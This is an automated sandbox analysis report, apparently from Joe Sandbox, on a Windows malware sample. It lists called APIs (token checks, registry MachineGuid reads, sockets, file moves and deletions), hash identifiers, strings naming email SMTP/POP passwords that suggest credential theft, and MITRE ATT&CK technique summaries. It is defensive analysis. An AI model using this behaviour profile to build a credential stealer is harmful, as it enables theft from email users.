Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

_wmemset.LIBCMT ref: 0040634F

Strings

CA, xrefs: 00406354, 0040635A

Memory Dump Source

Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_screens.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess_wmemset
String ID: CA
API String ID: 2773065342-1052703068
Opcode ID: 3fdcce989f46bcb3974c0fccb8cb8e604f0ebb2ab5075b70951c1ede03fd28a8
Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
Opcode Fuzzy Hash: 3fdcce989f46bcb3974c0fccb8cb8e604f0ebb2ab5075b70951c1ede03fd28a8
Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD

Function 00406086 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8

Strings

IDA, xrefs: 00406086

Memory Dump Source

Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_screens.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID: IDA
API String ID: 4114910276-365204570
Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95

Function 00402C03 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B

Strings

s1@, xrefs: 00402C15

Memory Dump Source

Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_screens.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID: s1@
API String ID: 190572456-427247929
Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_screens.jbxd

Yara matches

Similarity

API ID: Heap$AllocateOpenProcessQueryValue
String ID:
API String ID: 1425999871-0
Opcode ID: 3e4d8bbd79b3f452f46c2a76b22aa97fad6e7d266f80de6aae28761da4a6239d
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: 3e4d8bbd79b3f452f46c2a76b22aa97fad6e7d266f80de6aae28761da4a6239d
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Function 004060BD Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115

Memory Dump Source

Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_screens.jbxd

Yara matches

Similarity

API ID: CheckMembershipToken
String ID:
API String ID: 1351025785-0
Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764

Function 00403C62 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B

Memory Dump Source

Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_screens.jbxd

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4

Function 0040642C Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445

Memory Dump Source

Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_screens.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5

Function 00404EEA Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON

Download Yara Rule

APIs

send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07

Memory Dump Source

Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_screens.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98

Function 00403BD0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB

Memory Dump Source

Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_screens.jbxd

Yara matches

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664

Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_screens.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Function 0040427D Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297

Memory Dump Source

Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_screens.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8

Function 00404A19 Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35

Memory Dump Source

Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_screens.jbxd

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658

Function 00403C08 Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D

Memory Dump Source

Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_screens.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_screens.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Function 00403BEF Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04

Memory Dump Source

Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_screens.jbxd

Yara matches

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4

Function 00403BB7 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC

Memory Dump Source

Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_screens.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4

Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_screens.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Function 00403B64 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A

Memory Dump Source

Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_screens.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID:
API String ID: 1174141254-0
Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199

Function 00404DE5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

closesocket.WS2_32(00404EB0), ref: 00404DEB

Memory Dump Source

Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_screens.jbxd

Yara matches

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8

Function 00403F9E Relevance: 1.3, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA

Memory Dump Source

Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_screens.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8

Function 00403C40 Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55

Memory Dump Source

Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_screens.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4

Function 00406472 Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487

Memory Dump Source

Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_screens.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9

Function 004058EA Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903

Memory Dump Source

Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_screens.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559

Function 00405924 Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D

Memory Dump Source

Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_screens.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659

Non-executed Functions

Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_screens.jbxd

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON

Download Yara Rule

Strings

SmtpAccount, xrefs: 0040D0FA
PopAccount, xrefs: 0040D0B6
SmtpPort, xrefs: 0040D0EB
SmtpPassword, xrefs: 0040D117
PopPassword, xrefs: 0040D0D0
EmailAddress, xrefs: 0040D074
Technology, xrefs: 0040D08D
SmtpServer, xrefs: 0040D0DC
PopServer, xrefs: 0040D099
PopPort, xrefs: 0040D0A7

Memory Dump Source

Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_screens.jbxd

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Function 0040317B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_screens.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

